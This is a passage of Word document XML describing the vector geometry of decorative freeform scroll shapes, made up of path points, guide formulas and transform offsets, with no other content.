                                <a:lnTo>
                                  <a:pt x="98" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7916" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7957" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7973" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7965" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7932" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7883" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7809" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7768" y="778"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7702" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7685" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7693" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7718" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7751" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7850" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7866" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7875" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7875" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7858" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7842" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7768" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7809" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7784" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7743" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7735" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7759" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7792" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7833" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7866" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7899" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7924" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7932" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7924" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7883" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7817" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="117"/>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47685865" name="Freeform 50"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5551" y="4212"/>
                            <a:ext cx="56" cy="2062"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 337 w 337"/>
                              <a:gd name="T1" fmla="*/ 11908 h 12356"/>
                              <a:gd name="T2" fmla="*/ 288 w 337"/>
                              <a:gd name="T3" fmla="*/ 12200 h 12356"/>
                              <a:gd name="T4" fmla="*/ 172 w 337"/>
                              <a:gd name="T5" fmla="*/ 12356 h 12356"/>
                              <a:gd name="T6" fmla="*/ 49 w 337"/>
                              <a:gd name="T7" fmla="*/ 12259 h 12356"/>
                              <a:gd name="T8" fmla="*/ 0 w 337"/>
                              <a:gd name="T9" fmla="*/ 11967 h 12356"/>
                              <a:gd name="T10" fmla="*/ 41 w 337"/>
                              <a:gd name="T11" fmla="*/ 11772 h 12356"/>
                              <a:gd name="T12" fmla="*/ 123 w 337"/>
                              <a:gd name="T13" fmla="*/ 11675 h 12356"/>
                              <a:gd name="T14" fmla="*/ 205 w 337"/>
                              <a:gd name="T15" fmla="*/ 11753 h 12356"/>
                              <a:gd name="T16" fmla="*/ 238 w 337"/>
                              <a:gd name="T17" fmla="*/ 11908 h 12356"/>
                              <a:gd name="T18" fmla="*/ 222 w 337"/>
                              <a:gd name="T19" fmla="*/ 12064 h 12356"/>
                              <a:gd name="T20" fmla="*/ 156 w 337"/>
                              <a:gd name="T21" fmla="*/ 12122 h 12356"/>
                              <a:gd name="T22" fmla="*/ 107 w 337"/>
                              <a:gd name="T23" fmla="*/ 12084 h 12356"/>
                              <a:gd name="T24" fmla="*/ 90 w 337"/>
                              <a:gd name="T25" fmla="*/ 11986 h 12356"/>
                              <a:gd name="T26" fmla="*/ 131 w 337"/>
                              <a:gd name="T27" fmla="*/ 11870 h 12356"/>
                              <a:gd name="T28" fmla="*/ 140 w 337"/>
                              <a:gd name="T29" fmla="*/ 11928 h 12356"/>
                              <a:gd name="T30" fmla="*/ 140 w 337"/>
                              <a:gd name="T31" fmla="*/ 12025 h 12356"/>
                              <a:gd name="T32" fmla="*/ 181 w 337"/>
                              <a:gd name="T33" fmla="*/ 12025 h 12356"/>
                              <a:gd name="T34" fmla="*/ 197 w 337"/>
                              <a:gd name="T35" fmla="*/ 11908 h 12356"/>
                              <a:gd name="T36" fmla="*/ 131 w 337"/>
                              <a:gd name="T37" fmla="*/ 11772 h 12356"/>
                              <a:gd name="T38" fmla="*/ 57 w 337"/>
                              <a:gd name="T39" fmla="*/ 11850 h 12356"/>
                              <a:gd name="T40" fmla="*/ 41 w 337"/>
                              <a:gd name="T41" fmla="*/ 12025 h 12356"/>
                              <a:gd name="T42" fmla="*/ 74 w 337"/>
                              <a:gd name="T43" fmla="*/ 12181 h 12356"/>
                              <a:gd name="T44" fmla="*/ 156 w 337"/>
                              <a:gd name="T45" fmla="*/ 12259 h 12356"/>
                              <a:gd name="T46" fmla="*/ 255 w 337"/>
                              <a:gd name="T47" fmla="*/ 12142 h 12356"/>
                              <a:gd name="T48" fmla="*/ 296 w 337"/>
                              <a:gd name="T49" fmla="*/ 11772 h 12356"/>
                              <a:gd name="T50" fmla="*/ 288 w 337"/>
                              <a:gd name="T51" fmla="*/ 369 h 12356"/>
                              <a:gd name="T52" fmla="*/ 214 w 337"/>
                              <a:gd name="T53" fmla="*/ 136 h 12356"/>
                              <a:gd name="T54" fmla="*/ 115 w 337"/>
                              <a:gd name="T55" fmla="*/ 116 h 12356"/>
                              <a:gd name="T56" fmla="*/ 49 w 337"/>
                              <a:gd name="T57" fmla="*/ 253 h 12356"/>
                              <a:gd name="T58" fmla="*/ 41 w 337"/>
                              <a:gd name="T59" fmla="*/ 428 h 12356"/>
                              <a:gd name="T60" fmla="*/ 90 w 337"/>
                              <a:gd name="T61" fmla="*/ 564 h 12356"/>
                              <a:gd name="T62" fmla="*/ 172 w 337"/>
                              <a:gd name="T63" fmla="*/ 544 h 12356"/>
                              <a:gd name="T64" fmla="*/ 197 w 337"/>
                              <a:gd name="T65" fmla="*/ 369 h 12356"/>
                              <a:gd name="T66" fmla="*/ 156 w 337"/>
                              <a:gd name="T67" fmla="*/ 330 h 12356"/>
                              <a:gd name="T68" fmla="*/ 123 w 337"/>
                              <a:gd name="T69" fmla="*/ 408 h 12356"/>
                              <a:gd name="T70" fmla="*/ 156 w 337"/>
                              <a:gd name="T71" fmla="*/ 467 h 12356"/>
                              <a:gd name="T72" fmla="*/ 98 w 337"/>
                              <a:gd name="T73" fmla="*/ 447 h 12356"/>
                              <a:gd name="T74" fmla="*/ 90 w 337"/>
                              <a:gd name="T75" fmla="*/ 330 h 12356"/>
                              <a:gd name="T76" fmla="*/ 123 w 337"/>
                              <a:gd name="T77" fmla="*/ 253 h 12356"/>
                              <a:gd name="T78" fmla="*/ 197 w 337"/>
                              <a:gd name="T79" fmla="*/ 253 h 12356"/>
                              <a:gd name="T80" fmla="*/ 238 w 337"/>
                              <a:gd name="T81" fmla="*/ 369 h 12356"/>
                              <a:gd name="T82" fmla="*/ 222 w 337"/>
                              <a:gd name="T83" fmla="*/ 544 h 12356"/>
                              <a:gd name="T84" fmla="*/ 172 w 337"/>
                              <a:gd name="T85" fmla="*/ 661 h 12356"/>
                              <a:gd name="T86" fmla="*/ 82 w 337"/>
                              <a:gd name="T87" fmla="*/ 661 h 12356"/>
                              <a:gd name="T88" fmla="*/ 8 w 337"/>
                              <a:gd name="T89" fmla="*/ 505 h 12356"/>
                              <a:gd name="T90" fmla="*/ 16 w 337"/>
                              <a:gd name="T91" fmla="*/ 233 h 12356"/>
                              <a:gd name="T92" fmla="*/ 107 w 337"/>
                              <a:gd name="T93" fmla="*/ 19 h 12356"/>
                              <a:gd name="T94" fmla="*/ 230 w 337"/>
                              <a:gd name="T95" fmla="*/ 38 h 12356"/>
                              <a:gd name="T96" fmla="*/ 321 w 337"/>
                              <a:gd name="T97" fmla="*/ 330 h 12356"/>
                              <a:gd name="T98" fmla="*/ 337 w 337"/>
                              <a:gd name="T99" fmla="*/ 60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337" y="11772"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="337" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="321" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="12200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="12317"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="12356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="12337"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="12259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="12142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="11870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="11694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="11675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="11694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="11753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="11831"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="12064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="12103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="12122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="12122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="12084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="12045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="11870"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="11967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="11908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="11811"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="11792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="11850"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="11928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="12025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="12103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="12181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="12239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="12259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="12239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="12142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="11986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="11772"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="296" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="622"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="38"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="321" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337"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229994629" name="Freeform 51"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5616" y="6294"/>
                            <a:ext cx="1330" cy="133"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 156 w 7973"/>
                              <a:gd name="T1" fmla="*/ 681 h 798"/>
                              <a:gd name="T2" fmla="*/ 57 w 7973"/>
                              <a:gd name="T3" fmla="*/ 506 h 798"/>
                              <a:gd name="T4" fmla="*/ 49 w 7973"/>
                              <a:gd name="T5" fmla="*/ 272 h 798"/>
                              <a:gd name="T6" fmla="*/ 106 w 7973"/>
                              <a:gd name="T7" fmla="*/ 117 h 798"/>
                              <a:gd name="T8" fmla="*/ 181 w 7973"/>
                              <a:gd name="T9" fmla="*/ 97 h 798"/>
                              <a:gd name="T10" fmla="*/ 238 w 7973"/>
                              <a:gd name="T11" fmla="*/ 214 h 798"/>
                              <a:gd name="T12" fmla="*/ 230 w 7973"/>
                              <a:gd name="T13" fmla="*/ 408 h 798"/>
                              <a:gd name="T14" fmla="*/ 156 w 7973"/>
                              <a:gd name="T15" fmla="*/ 467 h 798"/>
                              <a:gd name="T16" fmla="*/ 139 w 7973"/>
                              <a:gd name="T17" fmla="*/ 369 h 798"/>
                              <a:gd name="T18" fmla="*/ 172 w 7973"/>
                              <a:gd name="T19" fmla="*/ 311 h 798"/>
                              <a:gd name="T20" fmla="*/ 197 w 7973"/>
                              <a:gd name="T21" fmla="*/ 369 h 798"/>
                              <a:gd name="T22" fmla="*/ 189 w 7973"/>
                              <a:gd name="T23" fmla="*/ 233 h 798"/>
                              <a:gd name="T24" fmla="*/ 139 w 7973"/>
                              <a:gd name="T25" fmla="*/ 214 h 798"/>
                              <a:gd name="T26" fmla="*/ 106 w 7973"/>
                              <a:gd name="T27" fmla="*/ 292 h 798"/>
                              <a:gd name="T28" fmla="*/ 106 w 7973"/>
                              <a:gd name="T29" fmla="*/ 467 h 798"/>
                              <a:gd name="T30" fmla="*/ 156 w 7973"/>
                              <a:gd name="T31" fmla="*/ 564 h 798"/>
                              <a:gd name="T32" fmla="*/ 230 w 7973"/>
                              <a:gd name="T33" fmla="*/ 545 h 798"/>
                              <a:gd name="T34" fmla="*/ 279 w 7973"/>
                              <a:gd name="T35" fmla="*/ 408 h 798"/>
                              <a:gd name="T36" fmla="*/ 279 w 7973"/>
                              <a:gd name="T37" fmla="*/ 194 h 798"/>
                              <a:gd name="T38" fmla="*/ 213 w 7973"/>
                              <a:gd name="T39" fmla="*/ 19 h 798"/>
                              <a:gd name="T40" fmla="*/ 98 w 7973"/>
                              <a:gd name="T41" fmla="*/ 39 h 798"/>
                              <a:gd name="T42" fmla="*/ 8 w 7973"/>
                              <a:gd name="T43" fmla="*/ 253 h 798"/>
                              <a:gd name="T44" fmla="*/ 16 w 7973"/>
                              <a:gd name="T45" fmla="*/ 545 h 798"/>
                              <a:gd name="T46" fmla="*/ 139 w 7973"/>
                              <a:gd name="T47" fmla="*/ 759 h 798"/>
                              <a:gd name="T48" fmla="*/ 255 w 7973"/>
                              <a:gd name="T49" fmla="*/ 798 h 798"/>
                              <a:gd name="T50" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T51" fmla="*/ 798 h 798"/>
                              <a:gd name="T52" fmla="*/ 7916 w 7973"/>
                              <a:gd name="T53" fmla="*/ 681 h 798"/>
                              <a:gd name="T54" fmla="*/ 7973 w 7973"/>
                              <a:gd name="T55" fmla="*/ 408 h 798"/>
                              <a:gd name="T56" fmla="*/ 7932 w 7973"/>
                              <a:gd name="T57" fmla="*/ 136 h 798"/>
                              <a:gd name="T58" fmla="*/ 7809 w 7973"/>
                              <a:gd name="T59" fmla="*/ 0 h 798"/>
                              <a:gd name="T60" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T61" fmla="*/ 97 h 798"/>
                              <a:gd name="T62" fmla="*/ 7685 w 7973"/>
                              <a:gd name="T63" fmla="*/ 292 h 798"/>
                              <a:gd name="T64" fmla="*/ 7718 w 7973"/>
                              <a:gd name="T65" fmla="*/ 486 h 798"/>
                              <a:gd name="T66" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T67" fmla="*/ 564 h 798"/>
                              <a:gd name="T68" fmla="*/ 7850 w 7973"/>
                              <a:gd name="T69" fmla="*/ 525 h 798"/>
                              <a:gd name="T70" fmla="*/ 7875 w 7973"/>
                              <a:gd name="T71" fmla="*/ 369 h 798"/>
                              <a:gd name="T72" fmla="*/ 7858 w 7973"/>
                              <a:gd name="T73" fmla="*/ 253 h 798"/>
                              <a:gd name="T74" fmla="*/ 7817 w 7973"/>
                              <a:gd name="T75" fmla="*/ 214 h 798"/>
                              <a:gd name="T76" fmla="*/ 7768 w 7973"/>
                              <a:gd name="T77" fmla="*/ 311 h 798"/>
                              <a:gd name="T78" fmla="*/ 7792 w 7973"/>
                              <a:gd name="T79" fmla="*/ 331 h 798"/>
                              <a:gd name="T80" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T81" fmla="*/ 331 h 798"/>
                              <a:gd name="T82" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T83" fmla="*/ 428 h 798"/>
                              <a:gd name="T84" fmla="*/ 7784 w 7973"/>
                              <a:gd name="T85" fmla="*/ 467 h 798"/>
                              <a:gd name="T86" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T87" fmla="*/ 311 h 798"/>
                              <a:gd name="T88" fmla="*/ 7759 w 7973"/>
                              <a:gd name="T89" fmla="*/ 136 h 798"/>
                              <a:gd name="T90" fmla="*/ 7833 w 7973"/>
                              <a:gd name="T91" fmla="*/ 97 h 798"/>
                              <a:gd name="T92" fmla="*/ 7899 w 7973"/>
                              <a:gd name="T93" fmla="*/ 175 h 798"/>
                              <a:gd name="T94" fmla="*/ 7932 w 7973"/>
                              <a:gd name="T95" fmla="*/ 369 h 798"/>
                              <a:gd name="T96" fmla="*/ 7883 w 7973"/>
                              <a:gd name="T97" fmla="*/ 603 h 798"/>
                              <a:gd name="T98" fmla="*/ 7726 w 7973"/>
                              <a:gd name="T99" fmla="*/ 70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700"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="156" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="238" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="106" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="172" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="98" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="16" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="759"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7726" y="798"/>
